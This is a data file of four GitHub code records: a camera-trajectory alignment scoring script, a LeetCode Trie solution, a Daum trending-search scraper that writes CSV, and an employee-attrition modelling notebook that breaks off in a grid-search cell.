+{"seq_id":"12653924532","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/../../'))\nsys.path.append(os.path.abspath('/grad/1/iida/mytools/python2.7/lib/python2.7/site-packages/'))\n\nimport argparse\nimport math\nimport cv2\nimport numpy as np\nimport csv\nimport glob\nimport yaml\nimport pickle\nfrom multiprocessing import Pool\n\nIN_RECONSTRUCTION_FILENAME = \"tangoCameraPose_floor.json\"\nTRAJECTORY_FILENAME = \"2dtrajectory.csv\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='create score map')\n parser.add_argument('test_num_dir', help='path to data dir to be processed')\n parser.add_argument('-p', '--parameter', nargs='?', type=str, default='parameter.yaml', help='load parameter yaml file(default=parameter.yaml)')\n parser.add_argument('-d', '--data', nargs='?', type=str, default='data.yaml', help='load data yaml file(default=data.yaml)')\n parser.add_argument('-f', '--target_floors', nargs='*', type=str, help='target floor names')\n parser.add_argument('-t', '--targets', nargs='*', type=str, help='target data names')\n parser.add_argument('-c', '--config', nargs='?', type=str, help='load config yaml file')\n parser.add_argument('-a', '--plot_all', default=False, action='store_true', help='create for all floor(default=False)')\n parser.add_argument('-o', '--target_data_config', nargs='?', type=str, default=None, help='target data config(default: same as data)')\n parser.add_argument('-j', '--process_num', nargs='?', type=int, default='4', help='process number(default=4)')\n args = parser.parse_args()\n\n # set args\n test_num_dir = args.test_num_dir\n target_floors = args.target_floors\n targets = args.targets\n plot_all = args.plot_all\n process_num = args.process_num\n parameter_fn = os.path.join(test_num_dir, args.parameter)\n data_dir = os.path.join(test_num_dir, os.path.splitext(args.data)[0])\n data_config_fn = os.path.join(test_num_dir, args.data)\n target_data_config_fn = data_config_fn if args.target_data_config is None else os.path.join(test_num_dir, args.target_data_config)\n results_dir = os.path.join(data_dir, 'score')\n\n # logger setting\n log_fn = os.path.join(os.path.join(data_dir), 'log.txt')\n import logging\n logger = logging.getLogger('testLogger')\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('(PID:%(process)d)[%(asctime)s][%(levelname)s] %(message)s')\n fh = logging.FileHandler(log_fn)\n logger.addHandler(fh)\n fh.setFormatter(formatter)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n sh.setFormatter(formatter)\n logger.info('Start Logging: {}'.format(log_fn))\n # logger setting done\n\n # set parameters\n logger.info('load meta yaml file: {}'.format(parameter_fn))\n with open(parameter_fn, 'r') as f:\n parameter = yaml.load(f)\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n\n pix_per_meter = parameter['setting']['pix_per_meter']\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n align_step = parameter['setting']['align_step']\n align_voxel_size = parameter['setting']['align_voxel_size']\n decimate = parameter['setting']['align_decimate']\n\n fire_threshold = parameter['setting']['fire_threshold']\n good_consistency_threshold = parameter['setting']['good_consistency_threshold']\n\n hit_shot_count_threshold = parameter['setting']['hit_shot_count_threshold']\n floor_voxel_count_threshold = 
parameter['setting']['floor_voxel_count_threshold']\n\n max_save_num = parameter['setting']['max_save_num']\n max_save_znum = parameter['setting']['max_save_znum']\n\n # load datasets\n logger.info('load target data yaml file: {}'.format(target_data_config_fn))\n with open(target_data_config_fn, 'r') as f:\n data_config = yaml.load(f)\n floorplans_dir = data_config['path']['floorplans']\n datasets_dir = data_config['path']['datasets']\n\n # load target pairs\n target_pairs = {}\n if target_floors is None:\n target_floors = []\n for floor in data_config['floors']:\n if data_config['floors'][floor]['val']:\n target_floors.append(floor)\n if targets is None:\n targets = []\n for dn in data_config['datasets']:\n # if 'target_floor_all' in config['datasets'][dn] and config['datasets'][dn]['target_floor_all']:\n # target_pairs[dn] = target_floors\n # elif 'target_floor' in config['datasets'][dn]:\n # floors = []\n # if config['datasets'][dn]['target_floor'] is None:\n # continue\n # for floor in config['datasets'][dn]['target_floor']:\n # floors.append(floor)\n # target_pairs[dn] = floors\n if data_config['datasets'][dn] is not None and 'target' in data_config['datasets'][dn] and data_config['datasets'][dn]['target']:\n target_pairs[dn] = target_floors\n else:\n for target in targets:\n target_pairs[target] = target_floors\n\n # print target pairs\n for dn in target_pairs:\n logger.info('target pairs: {}'.format(dn))\n for floor in target_pairs[dn]:\n logger.info(' {}'.format(floor))\n\n for data_name in target_pairs:\n target_dir = os.path.join(results_dir, data_name)\n\n tra_fn = os.path.join(datasets_dir, '{}/2dtrajectory.csv'.format(data_name))\n tra_dict = {}\n with open(tra_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n x = int(row[1])\n y = int(row[2])\n z = float(row[4]) * pix_per_meter # z will come in meter\n tra_dict[k] = [x, y, z]\n logger.info('load {} trajectory points from {}'.format(len(tra_dict), tra_fn))\n\n meta_fn = os.path.join(datasets_dir, '{}/meta.yaml'.format(data_name))\n with open(meta_fn, 'r') as f:\n meta = yaml.load(f)\n logger.info('load meta data {}'.format(meta_fn))\n\n for floor_fn in meta['floorplans']:\n target_floor_dir = os.path.join(target_dir, os.path.splitext(floor_fn)[0])\n if not os.path.exists(target_floor_dir):\n logger.info('target floor not found: {}'.format(target_floor_dir))\n continue\n logger.info('target floor: {}'.format(floor_fn))\n\n fp_fn = os.path.join(floorplans_dir, floor_fn)\n fp_img = cv2.imread(fp_fn)\n\n # load score\n score_fn_list = glob.glob(os.path.join(target_floor_dir, 'score/*.csv'))\n score_fn_list.sort()\n score_fn_list = score_fn_list[::decimate]\n logger.info('load {} scores'.format(len(score_fn_list)))\n target_tra_dict = {}\n range_x, range_y, range_z = None, None, None\n score_yxz_dict = {}\n floormask_yxz_dict = {}\n score_map_count = None\n\n ## load score map from csv\n score_map_dict = {}\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n score_map = np.zeros((fp_img.shape[0], fp_img.shape[1], 1), dtype=float)\n # score_map = np.zeros((fp_img.shape[0]//align_voxel_size[1], fp_img.shape[1]//align_voxel_size[0], 1), dtype=float)\n score_map += -1 # for out-range of floormask\n with open(score_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n score = float(row[2])\n score_map[int(y-crop_step/2):int(y+crop_step/2), int(x-crop_step/2):int(x+crop_step/2)] = score\n # 
score_map[(y-crop_step/2)//align_voxel_size[1]:(y+crop_step/2)//align_voxel_size[1], (x-crop_step/2)//align_voxel_size[0]:(x+crop_step/2)//align_voxel_size[0]] = score # center to topleft\n score_map_dict[shot_name] = score_map\n logger.info('load score map from csv')\n\n # create score map of each translation(len(range_y)*len(range_x))\n logger.info('start to create score map of each translation')\n # results = [[] for z in range(len(range_z))]\n\n # calc_score\n def calc_score(arg):\n tra_y = arg[0]\n tra_x = arg[1]\n tra_z = arg[2]\n\n # count number of shots which hit floor\n hit_shot_list = []\n count_yx = np.zeros((fp_img.shape[0], fp_img.shape[1]), dtype=int)\n # floor_voxel_count = 0\n floor_voxel_count = 0\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n if shot_name not in tra_dict:\n\n continue\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = ((xyz[1] + tra_y)//crop_step) * crop_step\n x = ((xyz[0] + tra_x)//crop_step) * crop_step\n z = xyz[2] + tra_z\n if not (-align_step[2]/2 < z < align_step[2]/2):\n continue\n if y < 0 or y >= score_map_dict[shot_name].shape[0] or \\\n x < 0 or x >= score_map_dict[shot_name].shape[1] or \\\n score_map_dict[shot_name][y][x] < 0: # out of range\n continue\n\n if count_yx[y, x] == 0:\n floor_voxel_count += 1\n count_yx[y:y+crop_step, x:x+crop_step] += 1\n hit_shot_list.append(shot_name)\n\n # sum scores for each voxel\n score = 0.0\n fire = []\n c = 0\n for shot_name in hit_shot_list:\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = int(xyz[1] + tra_y)\n x = int(xyz[0] + tra_x)\n s = score_map_dict[shot_name][y][x]\n if s > fire_threshold:\n fire.append(shot_name)\n score += s/float(count_yx[y][x])\n\n # average\n score /= float(floor_voxel_count)\n\n result = {}\n result['x'] = int(tra_x)\n result['y'] = int(tra_y)\n result['z'] = int(tra_z)\n result['score'] = float(score)\n result['in_floor'] = hit_shot_list\n result['fire'] = fire\n\n return result\n\n # get tra_x, tra_y, tra_z\n tra_floor_fn = os.path.join(datasets_dir, '{}/2dtrajectory_{}.csv'.format(data_name, os.path.splitext(floor_fn)[0]))\n tra_floor_dict = {}\n c = 0\n tra_x = 0\n tra_y = 0\n tra_z = 0\n with open(tra_floor_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n tra_x += int(row[1]) - tra_dict[k][0]\n tra_y += int(row[2]) - tra_dict[k][1]\n tra_z += float(row[4]) * pix_per_meter - tra_dict[k][2]\n c += 1\n tra_x /= c\n tra_y /= c\n tra_z /= c\n logger.info('translation: ({}, {}, {})'.format(tra_x, tra_y, tra_z))\n result = calc_score([tra_y, tra_x, tra_z])\n\n # save results\n logger.info('creating result dict to save')\n out_info_fn = os.path.join(target_floor_dir, 'actual_score.yaml')\n data = {}\n data['actual'] = result\n with open(out_info_fn, 'w') as f:\n f.write(yaml.dump(data, default_flow_style=False))\n\n # plot data\n # load base image\n fp_img = cv2.imread(fp_fn)\n\n trax = int(result['x'])\n tray = int(result['y'])\n\n # plot trajectory\n for shot in score_fn_list: # here will cause error if DECIMATE is different with align info\n shot = os.path.splitext(os.path.basename(shot))[0] + '.png'\n if shot not in tra_dict:\n continue\n x, y = tra_dict[shot][0] + trax, tra_dict[shot][1] + tray\n\n if y in range(fp_img.shape[0]) and x in range(fp_img.shape[1]):\n if shot in result['fire']:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 
255), -1)\n elif shot in result['in_floor']:\n cv2.circle(fp_img, (x, y), 5, (255, 0, 0), -1)\n else:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 0), -1)\n\n # save image file\n out_img_fn = os.path.join(target_floor_dir, 'actual_{}.png'.format(result['z']))\n cv2.imwrite(out_img_fn, fp_img)\n logger.info(\"save {}\".format(out_img_fn))\n break\n\n","repo_name":"iidango/tangologger","sub_path":"manual_alignment/test/alignment/past_scripts/calc_actual_score.py","file_name":"calc_actual_score.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
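A toy numeric check of the translation-averaging step in the script above: each matched shot contributes the offset between the floor-aligned and free trajectories, and the mean offset becomes the rigid translation handed to calc_score. The numbers are made up.

dx = [5, 7, 6]               # x offsets (aligned minus free) from three matched shots
tra_x = sum(dx) / len(dx)
print(tra_x)                 # 6.0 -> the x component of the translation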
+{"seq_id":"21375216403","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] 实现 Trie (前缀树)\n#\n\n# @lc code=start\nclass Trie:\n\n def __init__(self, val=None, end=True):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.children = {}\n self.end = end\n self.val = val\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n if not word:\n return\n if word[0] not in self.children:\n self.children[word[0]] = Trie(word[0], len(word) == 1)\n c = self.children[word[0]]\n if len(word) == 1:\n c.end = True\n c.insert(word[1:])\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n if not word:\n return True\n if word[0] not in self.children:\n return False\n else:\n c = self.children[word[0]]\n if len(word) == 1:\n return c.end\n else:\n return c.search(word[1:])\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n if not prefix:\n return True\n if prefix[0] not in self.children:\n return False\n else:\n c = self.children[prefix[0]]\n return c.startsWith(prefix[1:])\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"cuyu/leetcode","sub_path":"208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37589624495","text":"import requests\nimport csv\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\ndaum_url = 'https://www.daum.net/'\nresponse = requests.get(daum_url).text\n\ndata = BeautifulSoup(response, 'html.parser')\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hotissue_builtin.hide > div.realtime_part > ol > li > div > div:nth-child(1) > span.txt_issue > a') # 여러개(리스트)\n# data.select_one() # 한 개\n\n\n# for idx, rank in enumerate(rankings, 1):\n# print(f'{idx}위 : {rank.text}')\n\n# 데��터를 딕셔너리로 만들기\n# result_dict = {}\n# for idx, rank in enumerate(rankings, 1):\n# result_dict[f'{idx}위'] = rank.text\n# print(result_dict)\n\n# 위에서 만든 데이터로 csv에 저장\n# with open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n# csv_writer = csv.writer(csvfile)\n# for item, rank in result_dict.items():\n# csv_writer.writerow([item, rank])\n\n# 먼저 데이터를 json 데이터처럼 다시 만들기\nresult_list = []\nfor idx, rank in enumerate(rankings, 1):\n result_dict = {'rank': f'{idx}위', 'ranker': rank.text}\n result_list.append(result_dict)\n# pprint(result_list)\n\n# 새로 만든 데이터를 바탕으로 DictWriter 를 사용하기\nwith open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n # 저장할 데이터들의 필드 이름을 미리 지정(딕셔터리의 key 이름과 일치해야 함)\n fieldnames = ['rank', 'ranker']\n csv_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n # 필드 이름을 csv 파일 최상단에 작성\n csv_writer.writeheader()\n # 리스트를 순회하며 key(csv의 필드)를 통해 value(내용)를 작성한다.ㄴ\n for item in result_list:\n csv_writer.writerow(item)","repo_name":"jung9156/studies","sub_path":"lecture/python/python_csv/daum_ranking.py","file_name":"daum_ranking.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72177150759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Background\n\n\n# In[ ]:\n\n\n#McCurr Health Consultancy is an MNC that has thousands of employees spread across the globe. \n#The company believes in hiring the best talent available and retaining them for as long as possible. \n#A huge amount of resources is spent on retaining existing employees through various initiatives. \n#The Head of People Operations wants to bring down the cost of retaining employees. For this, he proposes \n#limiting the incentives to only those employees who are at risk of attrition. As a recently hired Data \n#Scientist in the People Operations Department, you have been asked to identify patterns in characteristics \n#of employees who leave the organization. Also, you have to use this information to predict if an employee \n#is at risk of attrition. This information will be used to target them with incentives.\n\n\n# In[5]:\n\n\n#Objective\n\n\n# In[ ]:\n\n\n#To identify the different factors that drive attrition\n#To build a model to predict if an employee will attrite or not\n\n\n# In[3]:\n\n\n#Dataset Description\n\n\n# In[4]:\n\n\n#The data contains information on employees' demographic details, work-related metrics, and attrition flag.\n\n#EmployeeNumber - Unique Employee Identifier\n#Attrition - Did the employee attrite or not?\n#Age - Age of the employee\n#BusinessTravel - Travel commitments for the job\n#DailyRate - Data description not available\n#Department - Employee's Department\n#DistanceFromHome - Distance from work to home (in KM)\n#Education - Employee's Education. 1-Below College, 2-College, 3-Bachelor, 4-Master, 5-Doctor\n#EducationField - Field of Education\n#EnvironmentSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#Gender - Employee's gender\n#HourlyRate - Data description not available\n#JobInvolvement - 1-Low, 2-Medium, 3-High, 4-Very High\n#JobLevel - Level of job (1 to 5)\n#JobRole - Job Roles\n#JobSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#MaritalStatus - Marital Status\n#MonthlyIncome - Monthly Salary\n#MonthlyRate - Data description not available\n#NumCompaniesWorked - Number of companies worked at\n#Over18 - Whether the employee is over 18 years of age?\n#OverTime - Whether the employee is doing overtime?\n#PercentSalaryHike - The percentage increase in the salary last year\n#PerformanceRating - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#RelationshipSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#StandardHours - Standard Hours\n#StockOptionLevel - Stock Option Level\n#TotalWorkingYears - Total years worked\n#TrainingTimesLastYear - Number of training attended last year\n#WorkLifeBalance - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#YearsAtCompany - Years at Company\n#YearsInCurrentRole - Years in the current role\n#YearsSinceLastPromotion - Years since the last promotion\n#YearsWithCurrManager - Years with the current manager\n#In the real world, you will not find definitions for some of your variables. 
\n#It is part of the analysis to figure out what they might mean.\n\n#Note\n#Kindly do not run the code cells containing Hyperparameter Tuning using GridSearchCV during the session,\n#since they take considerable time to run.\n\n\n# In[2]:\n\n\n#Importing the libraries and overview of the dataset\n\n\n# In[6]:\n\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n# To scale the data using z-score\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.model_selection import train_test_split\n\n# Algorithms to use\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Metrics to evaluate the model\nfrom sklearn import metrics\n\nfrom sklearn.metrics import confusion_matrix, classification_report, precision_recall_curve, recall_score\n\nfrom sklearn import tree\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.ensemble import BaggingClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# For tuning the model\nfrom sklearn.model_selection import GridSearchCV\n\n# To ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[7]:\n\n\n#Loading the Dataset\n\n\n# In[8]:\n\n\n# Loading the dataset\ndf = pd.read_excel('/Users/yutaoyan/Desktop/HRemployeeGL/HREmployee.xlsx')\n\n\n# In[9]:\n\n\n# Looking at the first 5 records\ndf.head()\n\n\n# In[10]:\n\n\n#Checking the info of the dataset\n\n\n# In[11]:\n\n\n# Let us see the info of the data\ndf.info()\n\n\n# In[12]:\n\n\n#Observations:\n\n#There are 2940 observations and 34 columns in the dataset.\n#All the columns have 2940 non-null values, i.e., there are no missing values in the data.\n\n\n# In[13]:\n\n\n#Let's check the unique values in each column\n\n\n# In[14]:\n\n\n# Checking the count of unique values in each column\ndf.nunique()\n\n\n# In[15]:\n\n\n#Observations:\n\n#EmployeeNumber is an identifier which is unique for each employee, and we can drop this column as\n#it would not add any value to our analysis.\n#Over18 and StandardHours have only 1 unique value each. These columns will not add any value to our model,\n#hence we can drop them.\n#On the basis of the number of unique values in each column and the data description, we can identify the\n#continuous and categorical columns in the data.\n\n\n#Let's drop the columns mentioned above and define lists for numerical and categorical columns to\n#explore them separately.\n\n\n# In[16]:\n\n\n# Dropping the columns\ndf = df.drop(['EmployeeNumber', 'Over18', 'StandardHours'], axis = 1)\n\n\n# In[17]:\n\n\n# Creating numerical columns\nnum_cols = ['DailyRate', 'Age', 'DistanceFromHome', 'MonthlyIncome', 'MonthlyRate', 'PercentSalaryHike', 'TotalWorkingYears',\n            'YearsAtCompany', 'NumCompaniesWorked', 'HourlyRate', 'YearsInCurrentRole', 'YearsSinceLastPromotion',\n            'YearsWithCurrManager', 'TrainingTimesLastYear']\n\n# Creating categorical variables\ncat_cols = ['Attrition', 'OverTime', 'BusinessTravel', 'Department', 'Education', 'EducationField', 'JobSatisfaction', 'EnvironmentSatisfaction',\n            'WorkLifeBalance', 'StockOptionLevel', 'Gender', 'PerformanceRating', 'JobInvolvement', 'JobLevel', 'JobRole', 'MaritalStatus', 'RelationshipSatisfaction']\n\n\n# In[56]:\n\n\ndf2 = df.groupby('Attrition').median()\n\n\n# In[57]:\n\n\ndf2[num_cols].style.highlight_max(color=\"lightgreen\")\n\n\n# In[59]:\n\n\ndf = df.drop(['PercentSalaryHike', 'YearsSinceLastPromotion', 'PerformanceRating', 'HourlyRate'], axis=1)\n\n# Keep the column lists in sync with the frame; later cells index df with them\nnum_cols = [c for c in num_cols if c in df.columns]\ncat_cols = [c for c in cat_cols if c in df.columns]\n\n\n# In[18]:\n\n\n#Univariate analysis and data preprocessing; then we move to the model building section.\n\n\n# In[19]:\n\n\n#Univariate analysis of numerical columns\n\n\n# In[20]:\n\n\n# Checking summary statistics\ndf[num_cols].describe().T\n\n\n# In[21]:\n\n\n#Observations:\n\n#Average employee age is around 37 years. It has a high range, from 18 years to 60, indicating good age\n#diversity in the organization.\n#At least 50% of the employees live within a 7 KM radius of the organization. However, there are some\n#extreme values, given that the maximum value is 29 km.\n#The average monthly income of an employee is USD 6500. It has a high range of values from 1K-20K USD,\n#which is to be expected for any organization's income distribution. There is a big difference between\n#the 3rd quartile value (around USD 8400) and the maximum value (nearly USD 20000), showing that the\n#company's highest earners have a disproportionately large income in comparison to the rest of the\n#employees. Again, this is fairly common in most organizations.\n#The average salary hike of an employee is around 15%. At least 50% of employees got a salary hike of\n#14% or less, with the maximum salary hike being 25%.\n#The average number of years an employee is associated with the company is 7.\n#On average, the number of years since an employee got a promotion is ~2.19. 
The majority of employees\n#have been promoted since the last year.\n\n\n# In[22]:\n\n\n# Creating histograms\ndf[num_cols].hist(figsize = (14, 14))\n\nplt.show()\n\n\n# In[23]:\n\n\n#Observations:\n\n#The age distribution is close to a normal distribution, with the majority of employees between the ages\n#of 25 and 50.\n#DistanceFromHome also has a right-skewed distribution, meaning most employees live close to work but there\n#are a few that live further away.\n#MonthlyIncome and TotalWorkingYears are skewed to the right, indicating that the majority of workers are in\n#entry / mid-level positions in the organization.\n#The percentage salary hike is skewed to the right, which means employees are mostly getting lower percentage\n#salary increases.\n#The YearsAtCompany variable distribution shows a good proportion of workers with 10+ years, indicating a\n#significant number of loyal employees at the organization.\n#The YearsInCurrentRole distribution has three peaks at 0, 2, and 7. There are a few employees that have even\n#stayed in the same role for 15 years and more.\n#The YearsSinceLastPromotion variable distribution indicates that some employees have not received a promotion\n#in 10-15 years and are still working in the organization. These employees are assumed to be high work-experience\n#employees in upper-management roles, such as co-founders, C-suite employees, etc.\n#The distributions of DailyRate, HourlyRate, and MonthlyRate appear to be uniform and do not provide much\n#information. It could be that the daily rate refers to the income earned per extra day worked while the hourly\n#rate could refer to the same concept applied for extra hours worked per day. Since these rates tend to be\n#broadly similar for multiple employees in the same department, that explains the uniform distribution they show.\n\n\n# In[24]:\n\n\n#Univariate analysis for categorical variables\n\n\n# In[25]:\n\n\n# Printing the % of sub-categories in each category\nfor i in cat_cols:\n\n    print(df[i].value_counts(normalize = True))\n\n    print('*' * 40)\n\n\n# In[26]:\n\n\n#Observations:\n#The employee attrition rate is ~16%.\n#Around 28% of the employees are working overtime. This number appears to be on the higher side and might\n#indicate a stressed employee work-life.\n#71% of the employees have traveled rarely, while around 19% have to travel frequently.\n#Around 73% of the employees come from an educational background in the Life Sciences and Medical fields.\n#Over 65% of employees work in the Research & Development department of the organization.\n#Nearly 40% of the employees have low (1) or medium-low (2) job satisfaction and environment satisfaction\n#in the organization, indicating that the morale of the company appears to be somewhat low.\n#Over 30% of the employees show low (1) to medium-low (2) job involvement.\n#Over 80% of the employees either have none or very few stock options.\n#In terms of performance ratings, none of the employees is rated lower than 3 (excellent).\n#About 85% of employees have a performance rating equal to 3 (excellent), while the remaining have a\n#rating of 4 (outstanding). 
This could either mean that the majority of employees are top performers,\n#or the more likely scenario is that the organization could be highly lenient with its performance appraisal\n#process.\n\n\n# In[27]:\n\n\n#Model Building - Approach\n#Data preparation.\n#Partition the data into a train and test set.\n#Build a model on the train data.\n#Tune the model if required.\n#Test the model on the test set.\n\n\n# In[28]:\n\n\n#Data preparation\n\n\n# In[29]:\n\n\n#Creating dummy variables for the categorical variables\n\n\n# In[30]:\n\n\n# Creating a list of columns for which we will create dummy variables\nto_get_dummies_for = ['BusinessTravel', 'Department', 'EducationField', 'Gender', 'MaritalStatus', 'JobRole']\n\n# Creating dummy variables\ndf = pd.get_dummies(data = df, columns = to_get_dummies_for, drop_first = True)\n\n# Mapping overtime and attrition to 1/0\ndict_OverTime = {'Yes': 1, 'No': 0}\ndict_attrition = {'Yes': 1, 'No': 0}\n\ndf['OverTime'] = df.OverTime.map(dict_OverTime)\ndf['Attrition'] = df.Attrition.map(dict_attrition)\n\n\n# In[ ]:\n\n\n#Separating the independent variables (X) and the dependent variable (Y)\n\n\n# In[31]:\n\n\n# Separating the target variable and other variables\n\nY = df.Attrition\n\nX = df.drop(['Attrition'], axis = 1)\n\n\n# In[32]:\n\n\n#Splitting the data into 70% train and 30% test set\n\n\n# In[33]:\n\n\n# Splitting the data\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.3, random_state = 1, stratify = Y)\n\n\n# In[34]:\n\n\n# Creating metric function\n\ndef metrics_score(actual, predicted):\n\n    print(classification_report(actual, predicted))\n\n    cm = confusion_matrix(actual, predicted)\n\n    plt.figure(figsize = (8, 5))\n\n    sns.heatmap(cm, annot = True, fmt = '.2f', xticklabels = ['Not Attrite', 'Attrite'], yticklabels = ['Not Attrite', 'Attrite'])\n\n    plt.ylabel('Actual')\n\n    plt.xlabel('Predicted')\n\n    plt.show()\n\n\n# In[35]:\n\n\n# Building decision tree model\ndt = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n\n# In[36]:\n\n\n# Fitting decision tree model\ndt.fit(x_train, y_train)\n\n\n# In[37]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dt.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[38]:\n\n\n#Observation:\n\n#The Decision tree is giving a 100% score for all metrics on the training dataset.\n\n\n# In[39]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dt.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[60]:\n\n\nnp.round(dt.feature_importances_, 4)\n\n\n# In[40]:\n\n\n# Plot the feature importance\n\nimportances = dt.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[41]:\n\n\n# Choose the type of classifier\ndtree_estimator = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n# Grid of parameters to choose from\nparameters = {'max_depth': np.arange(4, 8),  # max_depth values 4, 5, 6, 7\n              'criterion': ['gini', 'entropy'],\n              'min_samples_leaf': [5, 10, 20, 25]\n             }\n\n# Type of scoring used to compare parameter combinations\nscorer = metrics.make_scorer(recall_score, pos_label = 1)\n\n# Run the grid search\ngridCV = GridSearchCV(dtree_estimator, parameters, scoring = scorer, cv = 10)\n\n# Fitting the grid search on the train data\ngridCV = gridCV.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\ndtree_estimator = gridCV.best_estimator_\n\n# Fit the best estimator to the data\ndtree_estimator.fit(x_train, y_train)\n\n\n# In[61]:\n\n\ngridCV.best_params_\n\n\n# In[42]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dtree_estimator.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[43]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dtree_estimator.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[44]:\n\n\nimportances = dtree_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[45]:\n\n\nfeatures = list(X.columns)\n\nplt.figure(figsize = (30, 20))\n\ntree.plot_tree(dt, max_depth = 4, feature_names = features, filled = True, fontsize = 12, node_ids = True, class_names = True)\n\nplt.show()\n\n\n# In[64]:\n\n\n# Fitting the Random Forest classifier on the training data\nrf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\nrf_estimator.fit(x_train, y_train)\n\n\n# In[47]:\n\n\n# Checking performance on the training data\ny_pred_train_rf = rf_estimator.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf)\n\n\n# In[48]:\n\n\n# Checking performance on the testing data\ny_pred_test_rf = rf_estimator.predict(x_test)\n\nmetrics_score(y_test, y_pred_test_rf)\n\n\n# In[49]:\n\n\nimportances = rf_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[69]:\n\n\n# Choose the type of classifier\nrf_estimator_tuned = RandomForestClassifier(class_weight = \"balanced\", random_state = 1)\n\n# Grid of parameters to choose from\nparams_rf = {\"max_depth\": [2, 3, 4, 5, 6],\n             \"n_estimators\": [100, 250, 500],\n             \"min_samples_leaf\": np.arange(1, 4, 1),\n             \"max_features\": ['log2', 'auto'],\n}\n\n# Type of scoring used to compare parameter combinations - recall score for class 1\nscorer = \"recall\"\n\n# Run the grid search\ngrid_obj = 